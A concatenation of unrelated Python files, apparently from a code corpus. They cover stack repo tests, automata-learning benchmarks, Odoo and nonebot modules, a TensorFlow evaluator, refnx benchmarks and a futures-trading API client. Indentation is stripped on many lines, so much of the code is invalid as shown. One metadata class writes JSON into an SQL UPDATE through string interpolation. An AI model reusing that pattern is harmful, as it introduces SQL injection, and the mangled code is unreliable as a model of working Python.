assert len(repo_data) == 1
assert repo_data[0]['name'] == 'test'
result = host.run('stack remove repo test')
assert result.rc == 0
# Run list repo again
result = host.run('stack list repo test output-format=json')
assert result.rc == 255
assert result.stderr.startswith('error - ')
def test_expanded_columns(self, host, host_os, add_repo):
        # Run list repo with just the test repo
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": None
}
]
def test_add_repo_with_pallet(self, host, host_os, add_repo, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks, revert_etc):
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
#result = host.run(f'stack add pallet /root/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
pallet_data = json.loads(result.stdout)
assert len(pallet_data) == 1
# get pallet id, as well as the -'d name in the correct order
from stack.commands import DatabaseConnection, get_mysql_connection, Command
from stack.argument_processors.pallet import PalletArgProcessor
from operator import attrgetter
p = PalletArgProcessor()
p.db = DatabaseConnection(get_mysql_connection())
minimal_pallet = p.get_pallets(args=['minimal'], params=pallet_data[0])[0]
pallet_name = '-'.join(attrgetter('name', 'version', 'rel', 'os', 'arch')(minimal_pallet))
# now attach the test repo to the pallet
result = host.run(f'stack set repo test pallet={minimal_pallet.id}')
assert result.rc == 0
# now verify it is attached to that pallet
result = host.run('stack list repo test expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
"name": "test",
"alias": "test",
"url": "test_url",
"autorefresh": False,
"assumeyes": False,
"type": "rpm-md",
"is_mirrorlist": False,
"gpgcheck": False,
"gpgkey": None,
"os": host_os,
"pallet name": pallet_name
}
]
# now verify that removing that pallet removes the repo as well
result = host.run('stack remove pallet minimal')
assert result.rc == 0
result = host.run('stack list repo')
assert result.rc == 0
assert result.stdout == ''
|
22283
|
import json
from ..connection import get_connection
class Metadata:
def __init__(self, database):
self.connection = get_connection(database).connection
    # The first list is the default join used if nothing is specified (should be extended).
    # Each list is ordered as [edge_name, node1_id, edge_node1_id, edge_node2_id, node2_id]
def get_metadata(self):
self.connection.execute("SELECT metadata FROM _meta")
metadata = json.loads(self.connection.fetchone()[0])
return metadata
def update_metadata(self, data):
self.connection.execute(f"UPDATE _meta SET metadata='{json.dumps(data)}'")
def get_default_join_info(self, node1, node2):
return self.get_metadata()[node1][node2][0]
def get_all_join_info(self, node1, node2):
return self.get_metadata()[node1][node2]
# {
# 'term_dict': {
# 'docs': [['term_doc', 'term_id', 'term_id', 'doc_id', 'doc_id']]
# },
# 'docs': {
# 'term_dict': [['term_doc', 'doc_id', 'doc_id', 'term_id', 'term_id']],
# 'entities': [['entity_doc', 'collection_id', 'doc_id', 'entity', 'entity']],
# 'authors': [['doc_author', 'collection_id', 'doc', 'author', 'author']]
# },
# 'entities': {
# 'docs': [['entity_doc', 'entity', 'entity', 'doc_id', 'collection_id']]
# },
# 'authors': {
# 'docs': [['doc_author', 'author', 'author', 'doc', 'collection_id']]
# }
# }
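# Hypothetical usage sketch, assuming a database whose _meta table holds the
# metadata layout shown in the comment block above:
#
#     meta = Metadata("example.db")          # illustrative database name
#     meta.get_default_join_info("docs", "authors")
#     # -> ['doc_author', 'collection_id', 'doc', 'author', 'author']
#     meta.get_all_join_info("term_dict", "docs")
#     # -> [['term_doc', 'term_id', 'term_id', 'doc_id', 'doc_id']]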
|
22291
|
from statistics import mean
import csv
from aalpy.SULs import DfaSUL, MealySUL, MooreSUL
from aalpy.learning_algs import run_Lstar
from aalpy.oracles import RandomWalkEqOracle
from aalpy.utils import generate_random_dfa, generate_random_mealy_machine, generate_random_moore_machine
num_states = 1000
alph_size = 5
repeat = 10
num_increases = 20
states = ['alph_size']
times_dfa = ['dfa_pypy_rs']
times_mealy = ['mealy_pypy_rs']
times_moore = ['moore_pypy_rs']
cex_processing = 'rs'
for i in range(num_increases):
print(i)
total_time_dfa = []
total_time_mealy = []
total_time_moore = []
for _ in range(repeat):
alphabet = list(range(alph_size))
dfa = generate_random_dfa(num_states, alphabet=alphabet, num_accepting_states=num_states // 2)
sul = DfaSUL(dfa)
# eq_oracle = StatePrefixEqOracle(alphabet, sul, walks_per_state=5, walk_len=40)
eq_oracle = RandomWalkEqOracle(alphabet, sul, num_steps=10000, reset_prob=0.09)
_, data = run_Lstar(alphabet, sul, eq_oracle, cex_processing=cex_processing, cache_and_non_det_check=False,
return_data=True, automaton_type='dfa')
total_time_dfa.append(data['learning_time'])
del dfa
del sul
del eq_oracle
mealy = generate_random_mealy_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)
sul_mealy = MealySUL(mealy)
# eq_oracle = StatePrefixEqOracle(alphabet, sul_mealy, walks_per_state=5, walk_len=40)
eq_oracle = RandomWalkEqOracle(alphabet, sul_mealy, num_steps=10000, reset_prob=0.09)
_, data = run_Lstar(alphabet, sul_mealy, eq_oracle, cex_processing=cex_processing,
cache_and_non_det_check=False,
return_data=True, automaton_type='mealy')
total_time_mealy.append(data['learning_time'])
del mealy
del sul_mealy
del eq_oracle
moore = generate_random_moore_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)
moore_sul = MooreSUL(moore)
# eq_oracle = StatePrefixEqOracle(alphabet, moore_sul, walks_per_state=5, walk_len=40)
eq_oracle = RandomWalkEqOracle(alphabet, moore_sul, num_steps=10000, reset_prob=0.09)
_, data = run_Lstar(alphabet, moore_sul, eq_oracle, cex_processing=cex_processing,
cache_and_non_det_check=False,
return_data=True, automaton_type='moore')
total_time_moore.append(data['learning_time'])
    # record the alphabet size that was just benchmarked, then grow it
    states.append(alph_size)
    alph_size += 5
# save data and keep averages
times_dfa.append(round(mean(total_time_dfa), 4))
times_mealy.append(round(mean(total_time_mealy), 4))
times_moore.append(round(mean(total_time_moore), 4))
with open('increasing_alphabet_experiments.csv', 'w') as f:
wr = csv.writer(f, dialect='excel')
wr.writerow(states)
wr.writerow(times_dfa)
wr.writerow(times_mealy)
wr.writerow(times_moore)
|
22300
|
from ralph.api.serializers import RalphAPISerializer
from ralph.api.viewsets import RalphAPIViewSet, RalphReadOnlyAPIViewSet
from ralph.api.routers import router
__all__ = [
'RalphAPISerializer',
'RalphAPIViewSet',
'RalphReadOnlyAPIViewSet',
'router',
]
|
22301
|
from odoo import models, fields, api
from odoo.exceptions import ValidationError
class DemoOdooWizardTutorial(models.Model):
_name = 'demo.odoo.wizard.tutorial'
_description = 'Demo Odoo Wizard Tutorial'
name = fields.Char('Description', required=True)
partner_id = fields.Many2one('res.partner', string='Partner')
@api.multi
def action_context_demo(self):
# if self._context.get('context_data', False):
if self.env.context.get('context_data'):
raise ValidationError('have context data')
raise ValidationError('hello')
@api.multi
def action_button(self):
for record in self:
record.with_context(context_data=True).action_context_demo()
|
22322
|
import re
from typing import Type, Union, Iterable
from nonebot.typing import overrides
from nonebot.adapters import Message as BaseMessage
from nonebot.adapters import MessageSegment as BaseMessageSegment
from .utils import escape, unescape
from .api import Message as GuildMessage
from .api import MessageArk, MessageEmbed
class MessageSegment(BaseMessageSegment["Message"]):
@classmethod
@overrides(BaseMessageSegment)
def get_message_class(cls) -> Type["Message"]:
return Message
@staticmethod
def ark(ark: MessageArk) -> "Ark":
return Ark("ark", data={"ark": ark})
@staticmethod
def embed(embed: MessageEmbed) -> "Embed":
return Embed("embed", data={"embed": embed})
@staticmethod
def emoji(id: str) -> "Emoji":
return Emoji("emoji", data={"id": id})
@staticmethod
def image(url: str) -> "Attachment":
return Attachment("attachment", data={"url": url})
@staticmethod
def mention_user(user_id: int) -> "MentionUser":
return MentionUser("mention_user", {"user_id": str(user_id)})
@staticmethod
def mention_channel(channel_id: int) -> "MentionChannel":
return MentionChannel("mention_channel", {"channel_id": str(channel_id)})
@staticmethod
def text(content: str) -> "Text":
return Text("text", {"text": content})
@overrides(BaseMessageSegment)
def is_text(self) -> bool:
return self.type == "text"
class Text(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return escape(self.data["text"])
class Emoji(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<emoji:{self.data['id']}>"
class MentionUser(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<@{self.data['user_id']}>"
class MentionEveryone(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return "@everyone"
class MentionChannel(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<#{self.data['channel_id']}>"
class Attachment(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<attachment:{self.data['url']}>"
class Embed(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<embed:{self.data['embed']}>"
class Ark(MessageSegment):
@overrides(MessageSegment)
def __str__(self) -> str:
return f"<ark:{self.data['ark']}>"
class Message(BaseMessage[MessageSegment]):
@classmethod
@overrides(BaseMessage)
def get_segment_class(cls) -> Type[MessageSegment]:
return MessageSegment
@overrides(BaseMessage)
def __add__(
self, other: Union[str, MessageSegment, Iterable[MessageSegment]]
) -> "Message":
return super(Message, self).__add__(
MessageSegment.text(other) if isinstance(other, str) else other
)
@overrides(BaseMessage)
def __radd__(
self, other: Union[str, MessageSegment, Iterable[MessageSegment]]
) -> "Message":
return super(Message, self).__radd__(
MessageSegment.text(other) if isinstance(other, str) else other
)
@staticmethod
@overrides(BaseMessage)
def _construct(msg: str) -> Iterable[MessageSegment]:
text_begin = 0
for embed in re.finditer(
r"\<(?P<type>(?:@|#|emoji:))!?(?P<id>\w+?)\>",
msg,
):
content = msg[text_begin : embed.pos + embed.start()]
if content:
yield Text("text", {"text": unescape(content)})
text_begin = embed.pos + embed.end()
if embed.group("type") == "@":
yield MentionUser("mention_user", {"user_id": embed.group("id")})
elif embed.group("type") == "#":
yield MentionChannel(
"mention_channel", {"channel_id": embed.group("id")}
)
else:
yield Emoji("emoji", {"id": embed.group("id")})
content = msg[text_begin:]
if content:
yield Text("text", {"text": unescape(msg[text_begin:])})
@classmethod
def from_guild_message(cls, message: GuildMessage) -> "Message":
msg = Message()
if message.content:
msg.extend(Message(message.content))
if message.attachments:
msg.extend(
Attachment("attachment", data={"url": seg.url})
for seg in message.attachments
if seg.url
)
if message.embeds:
msg.extend(Embed("embed", data={"embed": seg}) for seg in message.embeds)
if message.ark:
msg.append(Ark("ark", data={"ark": message.ark}))
return msg
def extract_content(self) -> str:
return "".join(
str(seg)
for seg in self
if seg.type
in ("text", "emoji", "mention_user", "mention_everyone", "mention_channel")
)
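# Minimal usage sketch (assumes this adapter package is importable so the
# relative imports above resolve); shows composing a message and rendering the
# guild markup that extract_content produces.
def _example_compose_message() -> str:
    msg = Message("hello ") + MessageSegment.mention_user(123456) + MessageSegment.text("world")
    # e.g. "hello <@123456>world" -- attachment/embed/ark segments would be skipped
    return msg.extract_content()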
|
22344
|
from configs import cfg
from src.utils.record_log import _logger
import numpy as np
import tensorflow as tf
import scipy.stats as stats
class Evaluator(object):
def __init__(self, model):
self.model = model
self.global_step = model.global_step
## ---- summary----
self.build_summary()
self.writer = tf.summary.FileWriter(cfg.summary_dir)
def get_evaluation(self, sess, dataset_obj, global_step=None):
_logger.add()
_logger.add('getting evaluation result for %s' % dataset_obj.data_type)
logits_list, loss_list = [], []
target_score_list, predicted_score_list = [], []
for sample_batch, _, _, _ in dataset_obj.generate_batch_sample_iter():
feed_dict = self.model.get_feed_dict(sample_batch, 'dev')
logits, loss, predicted_score = sess.run([self.model.logits, self.model.loss,
self.model.predicted_score], feed_dict)
logits_list.append(np.argmax(logits, -1))
loss_list.append(loss)
predicted_score_list.append(predicted_score)
for sample in sample_batch:
target_score_list.append(sample['relatedness_score'])
logits_array = np.concatenate(logits_list, 0)
loss_value = np.mean(loss_list)
target_scores = np.array(target_score_list)
predicted_scores = np.concatenate(predicted_score_list, 0)
# pearson, spearman, mse
pearson_value = stats.pearsonr(target_scores, predicted_scores)[0]
spearman_value = stats.spearmanr(target_scores, predicted_scores)[0]
mse_value = np.mean((target_scores - predicted_scores) ** 2)
# todo: analysis
# analysis_save_dir = cfg.mkdir(cfg.answer_dir, 'gs_%d' % global_step or 0)
# OutputAnalysis.do_analysis(dataset_obj, logits_array, accu_array, analysis_save_dir,
# cfg.fine_grained)
if global_step is not None:
if dataset_obj.data_type == 'train':
summary_feed_dict = {
self.train_loss: loss_value,
self.train_pearson: pearson_value,
self.train_spearman: spearman_value,
self.train_mse: mse_value,
}
summary = sess.run(self.train_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
elif dataset_obj.data_type == 'dev':
summary_feed_dict = {
self.dev_loss: loss_value,
self.dev_pearson: pearson_value,
self.dev_spearman: spearman_value,
self.dev_mse: mse_value,
}
summary = sess.run(self.dev_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
else:
summary_feed_dict = {
self.test_loss: loss_value,
self.test_pearson: pearson_value,
self.test_spearman: spearman_value,
self.test_mse: mse_value,
}
summary = sess.run(self.test_summaries, summary_feed_dict)
self.writer.add_summary(summary, global_step)
return loss_value, (pearson_value, spearman_value, mse_value)
# --- internal use ------
def build_summary(self):
with tf.name_scope('train_summaries'):
self.train_loss = tf.placeholder(tf.float32, [], 'train_loss')
self.train_pearson = tf.placeholder(tf.float32, [], 'train_pearson')
self.train_spearman = tf.placeholder(tf.float32, [], 'train_spearman')
self.train_mse = tf.placeholder(tf.float32, [], 'train_mse')
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_loss', self.train_loss))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_pearson', self.train_pearson))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_spearman', self.train_spearman))
tf.add_to_collection('train_summaries_collection', tf.summary.scalar('train_mse', self.train_mse))
self.train_summaries = tf.summary.merge_all('train_summaries_collection')
with tf.name_scope('dev_summaries'):
self.dev_loss = tf.placeholder(tf.float32, [], 'dev_loss')
self.dev_pearson = tf.placeholder(tf.float32, [], 'dev_pearson')
self.dev_spearman = tf.placeholder(tf.float32, [], 'dev_spearman')
self.dev_mse = tf.placeholder(tf.float32, [], 'dev_mse')
            tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_loss', self.dev_loss))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_pearson', self.dev_pearson))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_spearman', self.dev_spearman))
tf.add_to_collection('dev_summaries_collection', tf.summary.scalar('dev_mse', self.dev_mse))
self.dev_summaries = tf.summary.merge_all('dev_summaries_collection')
with tf.name_scope('test_summaries'):
self.test_loss = tf.placeholder(tf.float32, [], 'test_loss')
self.test_pearson = tf.placeholder(tf.float32, [], 'test_pearson')
self.test_spearman = tf.placeholder(tf.float32, [], 'test_spearman')
self.test_mse = tf.placeholder(tf.float32, [], 'test_mse')
            tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_loss', self.test_loss))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_pearson', self.test_pearson))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_spearman', self.test_spearman))
tf.add_to_collection('test_summaries_collection', tf.summary.scalar('test_mse', self.test_mse))
self.test_summaries = tf.summary.merge_all('test_summaries_collection')
|
22356
|
from . import utils
import os
import scanpy as sc
import scprep
import tempfile
URL = "https://ndownloader.figshare.com/files/25555751"
@utils.loader
def load_human_blood_nestorowa2016(test=False):
"""Download Nesterova data from Figshare."""
if test:
# load full data first, cached if available
adata = load_human_blood_nestorowa2016(test=False)
# Subsample data
adata = adata[:, :500].copy()
utils.filter_genes_cells(adata)
sc.pp.subsample(adata, n_obs=500)
        # Note: could also use 200-500 HVGs rather than the first 500 genes
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
else:
with tempfile.TemporaryDirectory() as tempdir:
filepath = os.path.join(tempdir, "human_blood_nestorowa2016.h5ad")
scprep.io.download.download_url(URL, filepath)
adata = sc.read(filepath)
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
|
22375
|
from data_process.census_process.census_data_creation_config import census_data_creation
fg_feature_extractor_architecture_list = [[28, 56, 28, 14],
[25, 50, 25, 12],
[56, 86, 56, 18],
[27, 54, 27, 13]]
intr_fg_feature_extractor_for_architecture_list = [[53, 78, 53, 15],
[84, 120, 84, 20],
[55, 81, 55, 15],
[81, 120, 81, 20],
[52, 78, 52, 15],
[83, 120, 83, 20]]
no_fg_feature_extractor_architecture = [136, 150, 60, 20]
pre_train_hyperparameters = {
"using_interaction": False,
"momentum": 0.99,
"weight_decay": 0.00001,
"lr": 5e-4,
"batch_size": 128,
"max_epochs": 600,
"epoch_patience": 2,
"valid_metric": ('ks', 'auc')
}
fine_tune_hyperparameters = {
"using_interaction": False,
"load_global_classifier": False,
"momentum": 0.99,
"weight_decay": 0.0,
"lr": 8e-4,
"batch_size": 128,
"valid_metric": ('ks', 'auc')
}
no_adaptation_hyperparameters = {
"apply_feature_group": False,
"train_data_tag": 'all', # can be either 'all' or 'tgt'
"momentum": 0.99,
"weight_decay": 0.00001,
"lr": 5e-4,
"batch_size": 128,
"max_epochs": 600,
"epoch_patience": 2,
"valid_metric": ('ks', 'auc')
}
data_dir = census_data_creation['processed_data_dir']
data_tag = 'all4000pos004'
data_hyperparameters = {
"source_ad_train_file_name": data_dir + f'undergrad_census9495_ad_{data_tag}_train.csv',
"source_ad_valid_file_name": data_dir + f'undergrad_census9495_ad_{data_tag}_valid.csv',
"src_tgt_train_file_name": data_dir + f'degree_src_tgt_census9495_{data_tag}_train.csv',
"target_ad_train_file_name": data_dir + f'grad_census9495_ad_{data_tag}_train.csv',
"target_ft_train_file_name": data_dir + f'grad_census9495_ft_{data_tag}_train.csv',
"target_ft_valid_file_name": data_dir + f'grad_census9495_ft_{data_tag}_valid.csv',
"target_ft_test_file_name": data_dir + f'grad_census9495_ft_{data_tag}_test.csv',
"census_fg_pretrained_model_dir": "census_fg_pretrained_model",
"census_fg_ft_target_model_dir": "census_fg_ft_target_model",
"census_no-fg_pretrained_model_dir": "census_no-fg_pretrained_model",
"census_no-fg_ft_target_model_dir": "census_no-fg_ft_target_model",
"census_no-ad_model_dir": "census_no-ad_model"
}
|
22383
|
from .. import global_vars as g
from ..window import Window
import numpy as np
from ..roi import makeROI
class TestSettings():
def test_random_roi_color(self):
initial = g.settings['roi_color']
g.settings['roi_color'] = 'random'
w1 = Window(np.random.random([10, 10, 10]))
roi1 = makeROI('rectangle', [[1, 1], [3, 3]])
roi2 = makeROI('rectangle', [[2, 2], [3, 3]])
assert roi1.pen.color().name() != roi2.pen.color().name(), 'Random ROI color is the same. This could be a random chance. Run repeatedly.'
g.settings['roi_color'] = '#00ff00'
roi3 = makeROI('rectangle', [[3, 3], [3, 3]])
assert roi3.pen.color().name() == "#00ff00", 'ROI color set. all rois are same color'
g.settings['roi_color'] = initial
def test_multitrace(self):
initial = g.settings['multipleTraceWindows']
g.settings['multipleTraceWindows'] = False
w1 = Window(np.random.random([10, 10, 10]))
roi1 = makeROI('rectangle', [[1, 1], [3, 3]])
roi1.plot()
roi2 = makeROI('rectangle', [[2, 2], [3, 3]])
roi2.plot()
assert roi1.traceWindow == roi2.traceWindow, 'Traces not plotted together.'
g.settings['multipleTraceWindows'] = True
roi3 = makeROI('rectangle', [[3, 3], [3, 3]])
roi3.plot()
assert roi3.traceWindow != roi1.traceWindow, 'Multiple trace windows'
g.settings['multipleTraceWindows'] = initial
|
22411
|
from time import strftime
from flask_wtf import FlaskForm
from wtforms import (
Form,
validators,
StringField,
IntegerField,
SubmitField,
BooleanField,
SelectField,
TextAreaField,
)
|
22414
|
import os.path
import numpy as np
import pickle
from .common import Benchmark
from refnx.analysis import CurveFitter, Objective, Parameter
import refnx.reflect
from refnx.reflect._creflect import abeles as c_abeles
from refnx.reflect._reflect import abeles
from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity
from refnx.dataset import ReflectDataset as RD
class Abeles(Benchmark):
def setup(self):
self.q = np.linspace(0.005, 0.5, 50000)
self.layers = np.array([[0, 2.07, 0, 3],
[50, 3.47, 0.0001, 4],
[200, -0.5, 1e-5, 5],
[50, 1, 0, 3],
[0, 6.36, 0, 3]])
self.repeat = 20
self.number = 10
def time_cabeles(self):
c_abeles(self.q, self.layers)
def time_abeles(self):
abeles(self.q, self.layers)
def time_reflectivity_constant_dq_q(self):
reflectivity(self.q, self.layers)
def time_reflectivity_pointwise_dq(self):
reflectivity(self.q, self.layers, dq=0.05 * self.q)
class Reflect(Benchmark):
timeout = 120.
# repeat = 2
def setup(self):
pth = os.path.dirname(os.path.abspath(refnx.reflect.__file__))
e361 = RD(os.path.join(pth, 'test', 'e361r.txt'))
sio2 = SLD(3.47, name='SiO2')
si = SLD(2.07, name='Si')
d2o = SLD(6.36, name='D2O')
polymer = SLD(1, name='polymer')
# e361 is an older dataset, but well characterised
structure361 = si | sio2(10, 4) | polymer(200, 3) | d2o(0, 3)
model361 = ReflectModel(structure361, bkg=2e-5)
model361.scale.vary = True
model361.bkg.vary = True
model361.scale.range(0.1, 2)
model361.bkg.range(0, 5e-5)
model361.dq = 5.
# d2o
structure361[-1].sld.real.vary = True
structure361[-1].sld.real.range(6, 6.36)
self.p = structure361[1].thick
structure361[1].thick.vary = True
structure361[1].thick.range(5, 20)
structure361[2].thick.vary = True
structure361[2].thick.range(100, 220)
structure361[2].sld.real.vary = True
structure361[2].sld.real.range(0.2, 1.5)
self.structure361 = structure361
self.model361 = model361
# e361.x_err = None
self.objective = Objective(self.model361,
e361)
self.fitter = CurveFitter(self.objective, nwalkers=200)
self.fitter.initialise('jitter')
def time_reflect_emcee(self):
# test how fast the emcee sampler runs in serial mode
self.fitter.sampler.run_mcmc(self.fitter._state, 30)
def time_reflect_sampling_parallel(self):
# discrepancies in different runs may be because of different numbers
# of processors
self.model361.threads = 1
self.fitter.sample(30, pool=-1)
def time_pickle_objective(self):
# time taken to pickle an objective
s = pickle.dumps(self.objective)
pickle.loads(s)
def time_pickle_model(self):
# time taken to pickle a model
s = pickle.dumps(self.model361)
pickle.loads(s)
    def time_pickle_parameter(self):
# time taken to pickle a parameter
s = pickle.dumps(self.p)
pickle.loads(s)
def time_structure_slabs(self):
self.structure361.slabs()
|
22420
|
import os
from abc import ABC, abstractmethod
class File(ABC):
"""
Abstract class representing text files.
"""
@abstractmethod
def __init__(self):
pass
@staticmethod
def write_file(filename, text, overwrite_existing=True):
"""
Writes output text to a file.
Args:
filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
text (str): desired contents of file
overwrite_existing (Bool): whether any existing files should be overwritten or not
Returns:
``True`` if write succeeded, ``False`` otherwise
"""
if not isinstance(text, str):
raise TypeError("cannot write non-string to file!")
if not overwrite_existing and os.path.exists(filename):
raise ValueError(f"{filename} already exists but not allowed to overwrite")
else:
try:
with open(filename, "w+") as output_file:
output_file.write(text)
return True
except OSError as e:
print(e)
return False
@staticmethod
def append_to_file(filename, text):
"""
Appends output text to a file.
Args:
filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
text (str): desired contents of file
Returns:
``True`` if write succeeded, ``False`` otherwise
"""
if not isinstance(text, str):
raise TypeError("cannot write non-string to file!")
if os.path.exists(filename):
try:
with open(filename, "a+") as output_file:
output_file.write(text)
return True
except OSError as e:
print(e)
return False
else:
raise ValueError(f"{filename} does not exist")
@staticmethod
def read_file(filename, lazy=False):
"""
Reads a file and parses into lines.
Args:
            filename (str): The path to the file.
            lazy (Bool): currently unused.
Returns:
A list containing all the lines in the file.
"""
with open(filename, "r") as filehandle:
lines = filehandle.read().splitlines()
return lines
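# Minimal usage sketch: the static methods can be called without subclassing
# (the file name below is illustrative).
def _example_file_roundtrip():
    File.write_file("example.txt", "first line\n")
    File.append_to_file("example.txt", "second line")
    return File.read_file("example.txt")  # -> ['first line', 'second line']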
|
22424
|
try:
from DeepRTS import Engine
except ImportError:
import Engine
try:
    from DeepRTS.Engine import Map, UnitManager, Constants, Player
except ImportError:
    from Engine import Map, UnitManager, Constants, Player
|
22478
|
import logging
import sys
from .pipeline import MWFPipeline
def build(config):
config["source"] = config["source"] or {}
config["tweaks"] = config["tweaks"] or []
config["converter"] = config["converter"] or {}
config["generator"] = config["generator"] or []
pipeline = MWFPipeline(config["source"].get("api_path"))
if config["source"].get("api_path") is not None:
pipeline.fetch_titles(**config["source"].get("kwargs"))
if config["source"].get("file_path") is not None:
title_file_path = config["source"].get("file_path")
if title_file_path is None:
logging.error("No api_path or file_path provided. Stop.")
sys.exit(1)
if isinstance(title_file_path, str):
title_file_path = [title_file_path]
for i in title_file_path:
pipeline.load_titles_from_file(i,
**config["source"].get("kwargs"))
pipeline.convert_to_words(config["tweaks"])
pipeline.export_words(config["converter"].get("use"),
**config["converter"].get("kwargs"))
generators = config["generator"]
if not isinstance(generators, list):
generators = [generators]
for gen in generators:
pipeline.generate_dict(gen.get("use"), **gen.get("kwargs"))
return pipeline.dict
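# Illustrative config sketch derived from the keys build() reads; the concrete
# names below ("opencc", "rime", the API URL) are placeholders, not a documented
# schema.
EXAMPLE_CONFIG = {
    "source": {
        "api_path": "https://zh.wikipedia.org/w/api.php",  # or None, with file_path set instead
        "file_path": None,
        "kwargs": {},
    },
    "tweaks": [],
    "converter": {"use": "opencc", "kwargs": {}},
    "generator": [{"use": "rime", "kwargs": {}}],
}
# words = build(EXAMPLE_CONFIG)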
|
22487
|
from .client import Client
from .consts import *
class FutureAPI(Client):
def __init__(self, api_key, api_secret_key, passphrase, use_server_time=False, first=False):
Client.__init__(self, api_key, api_secret_key, passphrase, use_server_time, first)
# query position
def get_position(self):
return self._request_without_params(GET, FUTURE_POSITION)
# query specific position
def get_specific_position(self, instrument_id):
return self._request_without_params(GET, FUTURE_SPECIFIC_POSITION + str(instrument_id) + '/position')
# query accounts info
def get_accounts(self):
return self._request_without_params(GET, FUTURE_ACCOUNTS)
# query coin account info
def get_coin_account(self, underlying):
return self._request_without_params(GET, FUTURE_COIN_ACCOUNT + str(underlying))
# query leverage
def get_leverage(self, underlying):
return self._request_without_params(GET, FUTURE_GET_LEVERAGE + str(underlying) + '/leverage')
# set leverage
def set_leverage(self, underlying, leverage, instrument_id='', direction=''):
params = {'leverage': leverage}
if instrument_id:
params['instrument_id'] = instrument_id
if direction:
params['direction'] = direction
return self._request_with_params(POST, FUTURE_SET_LEVERAGE + str(underlying) + '/leverage', params)
# query ledger
def get_ledger(self, underlying, after='', before='', limit='', type=''):
params = {}
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
if type:
params['type'] = type
return self._request_with_params(GET, FUTURE_LEDGER + str(underlying) + '/ledger', params, cursor=True)
# take order
# def take_order(self, instrument_id, type, price, size, client_oid='', order_type='0', match_price='0'):
# params = {'client_oid': client_oid, 'instrument_id': instrument_id, 'type': type, 'order_type': order_type, 'price': price, 'size': size, 'match_price': match_price}
# return self._request_with_params(POST, FUTURE_ORDER, params)
    # take order (place a new order)
    def take_order(self, client_oid, instrument_id, otype, price, size, leverage, order_type, match_price):
        params = {'client_oid': client_oid, 'instrument_id': instrument_id, 'type': otype, 'price': price, 'size': size, 'leverage': leverage, 'order_type': order_type, 'match_price': match_price}
return self._request_with_params(POST, FUTURE_ORDER, params)
# take orders
def take_orders(self, instrument_id, orders_data):
params = {'instrument_id': instrument_id, 'orders_data': orders_data}
return self._request_with_params(POST, FUTURE_ORDERS, params)
# revoke order
def revoke_order(self, instrument_id, order_id='', client_oid=''):
if order_id:
return self._request_without_params(POST, FUTURE_REVOKE_ORDER + str(instrument_id) + '/' + str(order_id))
elif client_oid:
return self._request_without_params(POST, FUTURE_REVOKE_ORDER + str(instrument_id) + '/' + str(client_oid))
# revoke orders
def revoke_orders(self, instrument_id, order_ids='', client_oids=''):
params = {}
if order_ids:
params = {'order_ids': order_ids}
elif client_oids:
params = {'client_oids': client_oids}
return self._request_with_params(POST, FUTURE_REVOKE_ORDERS + str(instrument_id), params)
# query order list
    def get_order_list(self, state, instrument_id, after='', before='', limit=''):
params = {'state': state}
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_ORDERS_LIST + str(instrument_id), params, cursor=True)
# query order info
def get_order_info(self, instrument_id, order_id='', client_oid=''):
if order_id:
return self._request_without_params(GET, FUTURE_ORDER_INFO + str(instrument_id) + '/' + str(order_id))
elif client_oid:
return self._request_without_params(GET, FUTURE_ORDER_INFO + str(instrument_id) + '/' + str(client_oid))
# query fills
def get_fills(self, instrument_id, order_id='', after='', before='', limit=''):
params = {'instrument_id': instrument_id}
if order_id:
params['order_id'] = order_id
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_FILLS, params, cursor=True)
# set margin_mode
def set_margin_mode(self, underlying, margin_mode):
params = {'underlying': underlying, 'margin_mode': margin_mode}
return self._request_with_params(POST, FUTURE_MARGIN_MODE, params)
# close_position
def close_position(self, instrument_id, direction):
params = {'instrument_id': instrument_id, 'direction': direction}
return self._request_with_params(POST, FUTURE_CLOSE_POSITION, params)
# cancel_all
def cancel_all(self, instrument_id, direction):
params = {'instrument_id': instrument_id, 'direction': direction}
return self._request_with_params(POST, FUTURE_CANCEL_ALL, params)
# take order_algo
def take_order_algo(self, instrument_id, type, order_type, size, trigger_price='', algo_price='', callback_rate='', algo_variance='', avg_amount='', price_limit='', sweep_range='', sweep_ratio='', single_limit='', time_interval=''):
